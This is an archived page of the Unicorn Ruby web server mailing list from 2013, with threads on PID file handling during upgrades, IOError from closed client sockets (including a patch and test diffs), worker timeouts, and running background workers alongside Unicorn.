http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: Issues with PID file renaming
  2013-11-26  1:00  3% Issues with PID file renaming Jimmy Soho
@ 2013-11-26  1:20  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-11-26  1:20 UTC (permalink / raw)
  To: unicorn list

Jimmy Soho <jimmy.soho@gmail.com> wrote:
> Hi Eric,
> 
> Since we upgraded from 4.6.2 to 4.7.0 we're regularly having issues
> where one or more unicorn master processes would not upgrade
> correctly, resulting in an (old) master process.
> 
> What I notice is the following: when upgrading with 4.6.2 the file
> unicorn.pid is copied to unicorn.pid.oldbin and the unicorn.pid file
> is updated (the (new) master process). After a while the worker pid
> files are updated and the unicorn.pid.oldbin file disappears, and all
> is fine.

Ugh.  This is what I feared...  Slow startup time of most Ruby web apps
doesn't help.

> When upgrading with 4.7.0 though the file unicorn.pid.oldbin is
> created, but there is no unicorn.pid file. After a while (when the new
> master process has finished initialising, and is ready to fork the
> workers) the worker pid files are updated and a unicorn.pid file
> appears, and then the unicorn.pid.oldbin file disappears.
> 
> So there is a relatively long period where there is no unicorn.pid file.
> 
> I think the problem for us is caused by monit, our process monitor,
> which monitors the unicorn.pid file:
> 
> check process unicorn with pidfile
> /srv/app.itrp-staging.com/shared/pids/unicorn.pid
>   start program = "/etc/init.d/unicorn start"
>   stop program = "/etc/init.d/unicorn stop"
>   ...

Is there an alternate way to monitor unicorn with monit?
But I'd like to keep your case working if possible.

> Because the unicorn.pid file is absent for a relatively long period
> monit will try to start unicorn, while an upgrade is in progress.
> (which might be another issue: the start action should recognise a
> start or upgrade process is already underway; sadly this check too
> relies on the existence of the unicorn.pid file)
> 
> I think the way 4.6.2 worked is better. There should be a pid file for
> the new master process the moment it's created.

> What do you think?

How about having the old process create a hard link to .oldbin,
and having the new one override the pid if Process.ppid == pid file?
The check is still racy, but that's what pid files are :<
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Issues with PID file renaming
@ 2013-11-26  1:00  3% Jimmy Soho
  2013-11-26  1:20  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jimmy Soho @ 2013-11-26  1:00 UTC (permalink / raw)
  To: mongrel-unicorn

Hi Eric,

Since we upgraded from 4.6.2 to 4.7.0 we're regularly having issues
where one or more unicorn master processes would not upgrade
correctly, resulting in an (old) master process.

What I notice is the following: when upgrading with 4.6.2 the file
unicorn.pid is copied to unicorn.pid.oldbin and the unicorn.pid file
is updated (the (new) master process). After a while the worker pid
files are updated and the unicorn.pid.oldbin file disappears, and all
is fine.

When upgrading with 4.7.0 though the file unicorn.pid.oldbin is
created, but there is no unicorn.pid file. After a while (when the new
master process has finished initialising, and is ready to fork the
workers) the worker pid files are updated and a unicorn.pid file
appears, and then the unicorn.pid.oldbin file disappears.

So there is a relatively long period where there is no unicorn.pid file.

I think the problem for us is caused by monit, our process monitor,
which monitors the unicorn.pid file:

check process unicorn with pidfile
/srv/app.itrp-staging.com/shared/pids/unicorn.pid
  start program = "/etc/init.d/unicorn start"
  stop program = "/etc/init.d/unicorn stop"
  ...

Because the unicorn.pid file is absent for a relatively long period
monit will try to start unicorn, while an upgrade is in progress.
(which might be another issue: the start action should recognise a
start or upgrade process is already underway; sadly this check too
relies on the existence of the unicorn.pid file)

I think the way 4.6.2 worked is better. There should be a pid file for
the new master process the moment it's created.

What do you think?

-- 
Jim
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Handling closed clients
       [not found]           ` <m21u2sjpc9.fsf@macdaddy.atl.damballa>
@ 2013-11-07 16:48  0%         ` Eric Wong
  2013-11-07 20:22  0%           ` [PATCH] stream_input: avoid IO#close on client disconnect Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-11-07 16:48 UTC (permalink / raw)
  To: Andrew Hobson; +Cc: mongrel-unicorn

Andrew Hobson <ahobson@gmail.com> wrote:
> Eric Wong <normalperson@yhbt.net> writes:
> 
> > (Please don't cull Cc:, I'm assuming you're not subscribed to the
> >  mailing list since we don't require subscriptions)
> 
> Sorry, that was unintentional.

No worries, and it is good to also send a copy to each recipient in the
thread in case Rubyforge is down (like it is right now).  If it stays
down, I'll have to find/make a replacement myself.

...And move to something more decentralized and resilient to downtime
while I'm at it.

> > With my proposed patch to eliminate IO#close from StreamInput,
> > this test is no longer an accurate representation of unicorn behavior.
> 
> I applied that one line patch a day and a half ago and we haven't seen
> the error in the field (yet). I am optimistic you have elegantly fixed
> the problem.
> 
> If we do see an error, I will send another email to the list.
> 
> Thanks again for your help,

No problem, I'll push that out later today.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Handling closed clients
       [not found]       ` <m2iow6k7nk.fsf@macdaddy.atl.damballa>
@ 2013-11-05 20:51  7%     ` Eric Wong
       [not found]           ` <m21u2sjpc9.fsf@macdaddy.atl.damballa>
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-11-05 20:51 UTC (permalink / raw)
  To: Andrew Hobson; +Cc: mongrel-unicorn

(Please don't cull Cc:, I'm assuming you're not subscribed to the
 mailing list since we don't require subscriptions)

Andrew Hobson <ahobson@gmail.com> wrote:
> Eric Wong <normalperson@yhbt.net> writes:
> 
> > Those clients should really be hitting nginx, first.
> 
> I apologize for not being clear.  They are hitting apache first.

Heh, just as bad, since I'm not aware of any Apache config which will
protect unicorn from slow clients.

> > Fwiw, wrapping the app Unicorn::PrereadInput middleware may help in
> > this situation if you're dealing with a buggy local client.
> 
> Hmm, I might give that a try.

I expect that to consolidate your errors to one place and your
application wont try to write errors.

But yeah, you're still opening up yourself to slow clients limiting
your concurrency without nginx.

> > IOError usually means an attempt to use the socket when it was already
> > closed (possibly after it hit ECONNRESET/EPIPE/ENOTCONN).
> >
> > The only place we close the client socket where it might be visible to a
> > Rack app is in the eof! method of StreamInput.  Based on what I'm
> > reading, this is what's happening.
> 
> Our application does not use the socket directly. It is a relatively
> simple sinatra application that is accepting a file upload. As far as I
> can tell from putting in some debugging statements in our code, the
> error happens when we return a 400 error status when certain parameters
> are missing.

Right, however your upload processing will indirectly trigger socket
reads: env["rack.input"].read -> Unicorn::StreamInput#eof! ->
Unicorn::ClientShutdown.

> I should have included this before, so here's an example stack trace
> (using a pre-release gem with the fixes from 24b9f66dcdda44378b4053645333ce9ce336b413):
> 
> ERROR -- : app error: closed stream (IOError)
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_response.rb:53:in `write'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_response.rb:53:in `http_response_write'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_server.rb:563:in `process_client'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_server.rb:633:in `worker_loop'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_server.rb:500:in `spawn_missing_workers'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_server.rb:511:in `maintain_worker_count'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/lib/unicorn/http_server.rb:277:in `join'
> ERROR -- : gems/unicorn-4.6.3.5.ga9df/bin/unicorn:126:in `<top (required)>'
> ERROR -- : bin/unicorn:21:in `load'
> ERROR -- : bin/unicorn:21:in `<main>'

Yep, I had your stack trace in my mind already :)

> So it looks to me like what happens is that unicorn tries to write to
> the socket to report the error and then it hits a generic IOError,
> possibly from kgio:
> 
> http://bogomips.org/kgio.git/tree/ext/kgio/my_fileno.h#n34

Yes, but it would really happen from anything which attempted to
use the socket.

> > However, lately, I'm thinking merely calling .shutdown on the socket is
> > sufficient (patch below), and the close just confuses things.
> 
> I tried it out on my test case below.
> 
> > The Rack application should _always_ be trapping exceptions it
> > generates, including DB.  Where we log "app error" is only to tell the
> > app author to fix their code and prevent a buggy app from completely
> > breaking a worker.
> 
> I agree that applications should be trapping exceptions. I speculated
> that the change is "incompatible" because now buggy applications that
> raise EOFError will not report a 500 error. In fact, they won't return
> anything at all. Maybe that's ok, but it seems like a pretty big change.
> Or maybe I am misunderstanding entirely.

Applications need to be aware of who raises EOFError.  It would handle
it differently if it's a backend connection it makes or if a client
triggered it (Unicorn::ClientShutdown).

Since Unicorn::ClientShutdown is a subclass of EOFError, that should
make things a little easier to distinguish (but unfortunately, forces
some client code to be Unicorn-specific).

> > Your patch is badly whitespace mangled so I can't apply it.
> 
> Please accept my apologies for the sloppiness. I have included a non
> mangled version below.
> 
> I think the test case I added called test_file_streamed_request_close
> accurately reproduces the situation we are encountering, even though it
> does so in a very heavy handed way.  The change to handle_error fixes
> the test case, but it does change the behavior of another test case.
> 
> > Anyways, I think closing the socket while app dispatch is running
> > is sufficient to avoid IOError (you'll end up hitting ENOTCONN
> > instead, I think).
> 
> I applied the patch, but it does not fix the
> test_file_streamed_request_close test case I have created.

Right.  The socket is no longer closed with my patch, so
your test case does not reproduce what unicorn might do internally.

> Thank you for your feedback,
> 
> diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
> index 402f133..3620427 100644
> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -547,8 +547,6 @@ class Unicorn::HttpServer
>    # the socket is closed at the end of this function
>    def handle_error(client, e)
>      code = case e
> -    when EOFError,Errno::ECONNRESET,Errno::EPIPE,Errno::ENOTCONN
> -      # client disconnected on us and there's nothing we can do

Removing this is bad, at least the Errno::* portions since
we might be outside of app dispatch and log_error would spew
a backtrace for every single dropped/incomplete connection
(this is still an issue on a LAN for me, but I use the worst LANs in
the world :x)

I'm trying to minimize the places we call IO#close on the socket,
since we'll trigger IOError in other places (as you've experienced).

>      when Unicorn::RequestURITooLongError
>        414
>      when Unicorn::RequestEntityTooLargeError
> @@ -556,8 +554,12 @@ class Unicorn::HttpServer
>      when Unicorn::HttpParserError # try to tell the client they're bad
>        400
>      else
> -      Unicorn.log_error(@logger, "app error", e)
> -      500
> +      if client.closed?
> +        # client disconnected on us and there's nothing we can do
> +      else
> +        Unicorn.log_error(@logger, "app error", e)
> +        500
> +      end
>      end
>      if code
>        client.kgio_trywrite(err_response(code, @request.response_start_sent))

In other words, your change to handle_error would fail the following case:

--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -265,4 +267,29 @@ class WebServerTest < Test::Unit::TestCase
   def test_listener_names
     assert_equal [ "127.0.0.1:#@port" ], Unicorn.listener_names
   end
+
+  def test_eof_headers
+    teardown
+    app = lambda { |env| [200, {}, []] }
+    redirect_test_io do
+      @server = HttpServer.new(app, :listeners => [ "127.0.0.1:#@port"] )
+      @server.start
+    end
+
+    sock = TCPSocket.new('127.0.0.1', @port)
+    sock.syswrite("GET / HTTP/1.0\r\n") # partial request
+    sock.shutdown
+    assert_raises(EOFError) { sock.readpartial(666) }
+    sock.close
+
+    # just send another complete request to ensure the log message from the
+    # first (failed) request is flushed out to FS
+    sock = TCPSocket.new('127.0.0.1', @port)
+    sock.syswrite("GET / HTTP/1.0\r\n\r\n")
+    assert_match %r{200 OK}, sock.read
+    sock.close
+
+    lines = File.readlines("test_stderr.#$$.log")
+    assert lines.grep(/app error:/).empty?
+  end
 end

(I thought we already had a test for this, but apparently not..)

> diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
> index e5b335f..2fca1b4 100644
> --- a/test/unit/test_server.rb
> +++ b/test/unit/test_server.rb
> @@ -145,8 +145,7 @@ class WebServerTest < Test::Unit::TestCase
>      # processing on us even during app dispatch
>      sock.shutdown(Socket::SHUT_WR)
>      IO.select([sock], nil, nil, 60) or raise "Timed out"
> -    buf = sock.read
> -    assert_equal "", buf
> +    assert_match %r{\AHTTP/1.[01] 500\b}, sock.sysread(4096)

I don't agree with this at all.  500 means something in the server
broke, but in this case the _client_ broke.

>      next_client = Net::HTTP.get(URI.parse("http://127.0.0.1:#@port/"))
>      assert_equal 'hello!\n', next_client
>      lines = File.readlines("test_stderr.#$$.log")
> @@ -265,4 +264,55 @@ class WebServerTest < Test::Unit::TestCase
>    def test_listener_names
>      assert_equal [ "127.0.0.1:#@port" ], Unicorn.listener_names
>    end
> +
> +  # ensure that EOFError from client code is not ignored
> +  def test_eof_app
> +    teardown
> +    app = lambda { |env| raise EOFError }
> +    # [200, {}, []] }
> +    redirect_test_io do
> +      @server = HttpServer.new(app, :listeners => [ "127.0.0.1:#@port"] )
> +      @server.start
> +    end

I don't think defining behavior here is good (other than being able to
handle subsequent, unrelated requests with the process).  This is a
application bug if it can't handle the exceptions it raises.

> +    sock = TCPSocket.new('127.0.0.1', @port)
> +    sock.syswrite("GET / HTTP/1.0\r\n\r\n")
> +    assert_match %r{\AHTTP/1.[01] 500\b}, sock.sysread(4096)
> +    assert_nil sock.close
> +    lines = File.readlines("test_stderr.#$$.log")
> +    assert lines.grep(/app error:/)
> +  end
> +
> +  def test_file_streamed_request_close
> +    teardown
> +    # do a funky dance so that the socket is closed partway though the request
> +    tmp = Tempfile.new('test_file_streamed_request_close')
> +    app = lambda { |env|
> +      while File.zero?(tmp.path)
> +        sleep(0.2)
> +      end
> +      tmp.unlink
> +      o = env['rack.input'].instance_variable_get(:@socket)
> +      o.close

With my proposed patch to eliminate IO#close from StreamInput,
this test is no longer an accurate representation of unicorn behavior.

> +      hdrs = { 'Content-Type' => 'text/plain' }
> +      [ 200, hdrs, [ "#$$\n" ] ]
> +    }
> +    # [200, {}, []] }
> +    redirect_test_io do
> +      @server = HttpServer.new(app, :listeners => [ "127.0.0.1:#@port"] )
> +      @server.start
> +    end
> +    sock = TCPSocket.new('127.0.0.1', @port)
> +    body = "a" * 10
> +    long = "PUT /test HTTP/1.1\r\nContent-length: #{body.length + 10}\r\n\r\n" + body
> +    sock.syswrite(long)
> +    sock.close
> +    tmp.puts "ok"
> +    tmp.flush
> +    while File.exists?(tmp.path)
> +      sleep(0.2)
> +    end
> +    lines = File.readlines("test_stderr.#$$.log")
> +    assert lines.grep(/app error:/).empty?
> +  end
> +
>  end
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 7%]

* [PATCH] stream_input: avoid IO#close on client disconnect
  2013-11-07 16:48  0%         ` Eric Wong
@ 2013-11-07 20:22  0%           ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-11-07 20:22 UTC (permalink / raw)
  To: Andrew Hobson; +Cc: mongrel-unicorn

Eric Wong <normalperson@yhbt.net> wrote:
> Andrew Hobson <ahobson@gmail.com> wrote:
> > I applied that one line patch a day and a half ago and we haven't seen
> > the error in the field (yet). I am optimistic you have elegantly fixed
> > the problem.
> > 
> > If we do see an error, I will send another email to the list.
> > 
> > Thanks again for your help,
> 
> No problem, I'll push that out later today.

Pushed, thanks again:

>From f4005d5efc608e7d75371f0d0527041facd33f89 Mon Sep 17 00:00:00 2001
From: Eric Wong <normalperson@yhbt.net>
Date: Thu, 7 Nov 2013 20:10:01 +0000
Subject: [PATCH] stream_input: avoid IO#close on client disconnect

This can avoid IOError from being seen by the application, and also
reduces points where IO#close may be called.  This is a good thing
if we eventually port this code into a low-level server like
cmogstored where per-client memory space is defined by FD number of
a client.

Reported-by: Andrew Hobson <ahobson@gmail.com>
---
 lib/unicorn/stream_input.rb | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index c8a4240..9278f47 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -139,10 +139,7 @@ private
     # we do support clients that shutdown(SHUT_WR) after the
     # _entire_ request has been sent, and those will not have
     # raised EOFError on us.
-    if @socket
-      @socket.shutdown
-      @socket.close
-    end
+    @socket.shutdown if @socket
   ensure
     raise Unicorn::ClientShutdown, "bytes_read=#{@bytes_read}", []
   end
-- 
1.8.4.483.g7fe67e6.dirty
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 0%]

* Re: pid file handling issue
  2013-10-24 17:51  0%       ` Michael Fischer
@ 2013-10-24 18:21  0%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-10-24 18:21 UTC (permalink / raw)
  To: unicorn list

Michael Fischer <mfischer@zendesk.com> wrote:
> On Wed, Oct 23, 2013 at 7:03 PM, Eric Wong <normalperson@yhbt.net> wrote:
> 
> >> > I read and stash the value of the pid file before issuing any USR2.
> >> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
> >> > to ensure it's dead.
> >>
> >> That's inherently racy; another process can claim the old PID in the interim.
> >
> > Right, but raciness goes for anything regarding pid files.
> >
> > The OS does make an effort to avoid recycling PIDs too often,
> > and going through all the PIDs in a system quickly is
> > probably rare.  I haven't hit it, at least.
> 
> That's not good enough.
> 
> The fact that the pid file contains a pid is immaterial to me; I don't
> even need to look at it.  I only care about when it was created, or
> what its inode number is, so that I can detect whether Unicorn was
> last successfully started or restarted.  rename(2) is atomic per POSIX
> and is not subject to race conditions.

Right, we looked at using rename last year but I didn't think it's possible
given we need to write the pid file before binding new listen sockets

  http://mid.gmane.org/20121127215146.GA23452@dcvr.yhbt.net

But perhaps we can drop the pid file late iff ENV["UNICORN_FD"] is
detected.  I'll see if that can be done w/o breaking compatibility.

> >> > Checking the mtime of the pidfile is really bizarre...
> >>
> >> Perhaps (though it's a normative criticism), but on the other hand, it
> >> isn't subject to the race above.
> >
> > It's still racy in a different way, though (file could change right
> > after checking).
> 
> If the file's mtime or inode number changes under my proposal, that
> means the reload must have been successful.   What race condition are
> you referring to that would render this conclusion inaccurate?

It doesn't mean the process didn't exit/crash right after writing the PID.

> > Having the process start time in /proc be unreliable because the server
> > has the wrong time is also in the same category of corner cases.
> 
> This is absolutely not true.  A significant minority, if not a
> majority, of servers will have at least slightly inaccurate wall
> clocks on boot.  This is usually corrected during boot by an NTP sync,
> but by then the die has already been cast insofar as ps(1) output is
> concerned.

But NTP syncs early in the boot process before most processes (including
unicorn) are started.  It shouldn't matter, then, right?

> > Also, can you check the inode of the /proc/$pid entry?  Perhaps
> 
> That's not portable.
> 
> > PID files are horrible, really :<
> 
> To reiterate, I'm not using the PID file in this instance to determine
> Unicorn's PID.  It could be empty, for all I care.

OK.  I assume you do the same for nginx?
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: pid file handling issue
  2013-10-24  2:03  0%     ` Eric Wong
@ 2013-10-24 17:51  0%       ` Michael Fischer
  2013-10-24 18:21  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2013-10-24 17:51 UTC (permalink / raw)
  To: unicorn list

On Wed, Oct 23, 2013 at 7:03 PM, Eric Wong <normalperson@yhbt.net> wrote:

>> > I read and stash the value of the pid file before issuing any USR2.
>> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
>> > to ensure it's dead.
>>
>> That's inherently racy; another process can claim the old PID in the interim.
>
> Right, but raciness goes for anything regarding pid files.
>
> The OS does make an effort to avoid recycling PIDs too often,
> and going through all the PIDs in a system quickly is
> probably rare.  I haven't hit it, at least.

That's not good enough.

The fact that the pid file contains a pid is immaterial to me; I don't
even need to look at it.  I only care about when it was created, or
what its inode number is, so that I can detect whether Unicorn was
last successfully started or restarted.  rename(2) is atomic per POSIX
and is not subject to race conditions.

>> > Checking the mtime of the pidfile is really bizarre...
>>
>> Perhaps (though it's a normative criticism), but on the other hand, it
>> isn't subject to the race above.
>
> It's still racy in a different way, though (file could change right
> after checking).

If the file's mtime or inode number changes under my proposal, that
means the reload must have been successful.   What race condition are
you referring to that would render this conclusion inaccurate?

> Having the process start time in /proc be unreliable because the server
> has the wrong time is also in the same category of corner cases.

This is absolutely not true.  A significant minority, if not a
majority, of servers will have at least slightly inaccurate wall
clocks on boot.  This is usually corrected during boot by an NTP sync,
but by then the die has already been cast insofar as ps(1) output is
concerned.

> Also, can you check the inode of the /proc/$pid entry?  Perhaps

That's not portable.

> PID files are horrible, really :<

To reiterate, I'm not using the PID file in this instance to determine
Unicorn's PID.  It could be empty, for all I care.

--Michael
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Forking non web processes
  @ 2013-10-24 16:25  6%   ` Alex Sharp
  0 siblings, 0 replies; 200+ results
From: Alex Sharp @ 2013-10-24 16:25 UTC (permalink / raw)
  To: unicorn list

On Thu, Oct 24, 2013 at 9:17 AM, Eric Wong <normalperson@yhbt.net> wrote:
> I'm also wondering why... sidekiq/resque are standalone daemons
> themselves.  Shouldn't that be done as part of the deploy/init process?
> (unicorn isn't going to become init/upstart/systemd)

Agree with Eric here. You probably want to run unicorn and sidekiq /
resque in a way that they're not coupled to one another. They should
have different startup scripts and monitoring properties. And
eventually you may want to move your background worker processes to
another machine.

- alex sharp
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 6%]

* Re: pid file handling issue
  2013-10-24  1:01  4%   ` Michael Fischer
@ 2013-10-24  2:03  0%     ` Eric Wong
  2013-10-24 17:51  0%       ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-10-24  2:03 UTC (permalink / raw)
  To: unicorn list

Michael Fischer <mfischer@zendesk.com> wrote:
> On Wed, Oct 23, 2013 at 5:53 PM, Eric Wong <normalperson@yhbt.net> wrote:
> 
> > I read and stash the value of the pid file before issuing any USR2.
> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
> > to ensure it's dead.
> 
> That's inherently racy; another process can claim the old PID in the interim.

Right, but raciness goes for anything regarding pid files.

The OS does make an effort to avoid recycling PIDs too often,
and going through all the PIDs in a system quickly is
probably rare.  I haven't hit it, at least.

> > Checking the mtime of the pidfile is really bizarre...
> 
> Perhaps (though it's a normative criticism), but on the other hand, it
> isn't subject to the race above.

It's still racy in a different way, though (file could change right
after checking).

> > OTOH, there's times when users accidentally remove a pid
> > file and regenerate by hand it from ps(1), too...
> 
> Sure, but (a) that's a corner case I'm not particularly concerned
> about, and (b) it wouldn't cause any problems, assuming the user did
> this before any reload attempt, and not in the middle or something.

Having the process start time in /proc be unreliable because the server
has the wrong time is also in the same category of corner cases.

Also, can you check the inode of the /proc/$pid entry?  Perhaps

PID files are horrible, really :<
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: pid file handling issue
  2013-10-24  0:53  0% ` Eric Wong
@ 2013-10-24  1:01  4%   ` Michael Fischer
  2013-10-24  2:03  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2013-10-24  1:01 UTC (permalink / raw)
  To: unicorn list

On Wed, Oct 23, 2013 at 5:53 PM, Eric Wong <normalperson@yhbt.net> wrote:

> I read and stash the value of the pid file before issuing any USR2.
> Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
> to ensure it's dead.

That's inherently racy; another process can claim the old PID in the interim.

> Checking the mtime of the pidfile is really bizarre...

Perhaps (though it's a normative criticism), but on the other hand, it
isn't subject to the race above.

> OTOH, there's times when users accidentally remove a pid
> file and regenerate by hand it from ps(1), too...

Sure, but (a) that's a corner case I'm not particularly concerned
about, and (b) it wouldn't cause any problems, assuming the user did
this before any reload attempt, and not in the middle or something.

--Michael
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: pid file handling issue
  2013-10-23 22:55  4% pid file handling issue Michael Fischer
@ 2013-10-24  0:53  0% ` Eric Wong
  2013-10-24  1:01  4%   ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-10-24  0:53 UTC (permalink / raw)
  To: unicorn list

Michael Fischer <mfischer@zendesk.com> wrote:
> Hi everyone,
> 
> While writing a script to determine the success or failure of a
> Unicorn reload attempt (without having to parse a log), I noticed that
> Unicorn doesn't preserve the timestamp of its pid file.  In other
> words, instead of renaming pidfile to pidfile.oldbin (and then back
> again if the reload failed), it creates a new pid file for each master
> phase change.
> 
> This means we cannot simply compare the mtime of the current pidfile
> against the time the USR2 signal was given in order to make a
> reasonable conclusion.
> 
> I tried another method, which was to look at the start time of the
> process as reported by ps(1), but on Linux, that time does not come
> from the wall clock: it's derived from the number of jiffies since
> system boot.  So it's not guaranteed to be accurate, especially if the
> wall clock was incorrect at system boot.
> 
> Are there any other methods anyone can suggest?  Otherwise, a change
> to Unicorn's behavior with respect to pid file maintenance would be
> kindly appreciated.

I read and stash the value of the pid file before issuing any USR2.
Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
to ensure it's dead.

Checking the mtime of the pidfile is really bizarre...

OTOH, there's times when users accidentally remove a pid
file and regenerate by hand it from ps(1), too...
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* pid file handling issue
@ 2013-10-23 22:55  4% Michael Fischer
  2013-10-24  0:53  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2013-10-23 22:55 UTC (permalink / raw)
  To: mongrel-unicorn

Hi everyone,

While writing a script to determine the success or failure of a
Unicorn reload attempt (without having to parse a log), I noticed that
Unicorn doesn't preserve the timestamp of its pid file.  In other
words, instead of renaming pidfile to pidfile.oldbin (and then back
again if the reload failed), it creates a new pid file for each master
phase change.

This means we cannot simply compare the mtime of the current pidfile
against the time the USR2 signal was given in order to make a
reasonable conclusion.

I tried another method, which was to look at the start time of the
process as reported by ps(1), but on Linux, that time does not come
from the wall clock: it's derived from the number of jiffies since
system boot.  So it's not guaranteed to be accurate, especially if the
wall clock was incorrect at system boot.

Are there any other methods anyone can suggest?  Otherwise, a change
to Unicorn's behavior with respect to pid file maintenance would be
kindly appreciated.

Best regards,

--Michael
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: More unexplained timeouts
  @ 2013-09-30  0:06  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-09-30  0:06 UTC (permalink / raw)
  To: unicorn list

nick@auger.net wrote:
> We're still suffering from unexplained workers timing out.  We
> recently upgraded to the latest unicorn 4.6.3 (while still on REE
> 1.8.7) in the hopes that it would solve our issues.  Unfortunately,
> this seemed to exacerbate the problem, with timeouts happening more
> frequently, but that could be related to greater precision in timeouts
> in newer versions of unicorn.  (In our unicorn 3.6.2, a timeout set to
> 120s might not ACTUALLY timeout until 180s or more, thus allowing a
> bit more time for Ruby to finish whatever it was choking on.)

Yes, there were some fixes in 4.x to improve the timeout accuracy.

> We dropped the timeout down to 65s (to make sure it was triggered) and
> then tried to add greater logging (per
> http://permalink.gmane.org/gmane.comp.lang.ruby.unicorn.general/1269.)
> The START/FINISH approach confirms it's not an issue with our
> application code, ie:
> 
> HH:MM:SS- S/F[PID]- /PATH
> 15:21:01- START-25904- /pathA
> 15:21:01- FINISH-25904- /pathA
> 15:21:01- START-25904- /pathB
> 15:21:01- FINISH-25904- /pathB
> 15:21:01- START-25904- /pathC
> 15:21:01- FINISH-25904- /pathC
> worker=11 PID:25904 timeout (66s > 65s), killing
> reaped #<Process::Status: pid=25904,signaled(SIGKILL=9)> worker=11
> 
> For each START we always get a corresponding FINISH and then the
> worker is killed.  Additionally, our nginx logs confirm that this last
> request was sent back to the client.  No 'upstream' errors in our
> nginx log, either.
> 
> When we tried the Thread sleep approach, nothing actually appeared in
> the logs.  I imagine this means that ruby or some C extension is
> misbehaving.

Sounds like it.  1.8 and old C extensions could easily lock up the
interpreter on blocking calls.

Another problem could be using new versions of C extensions that are no
longer tested under 1.8.  I admit I haven't tested recent versions of
unicorn/kgio/raindrops on 1.8 lately, either, but I'm _fairly_ sure they
still work since they haven't changed much.

> Unfortunately, it's been impossible for us to recreate this in
> development.  

Are you running any different gems/extensions in development vs
production?

> Thoughts?
> 
> RHEL 5.6
> REE 1.8.7 2011.12
> Unicorn 4.6.3
> 16 unicorn workers on 8 cores
> No swap activity, no peaks in load

What other gems/extensions do you use?
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: IOError: closed stream
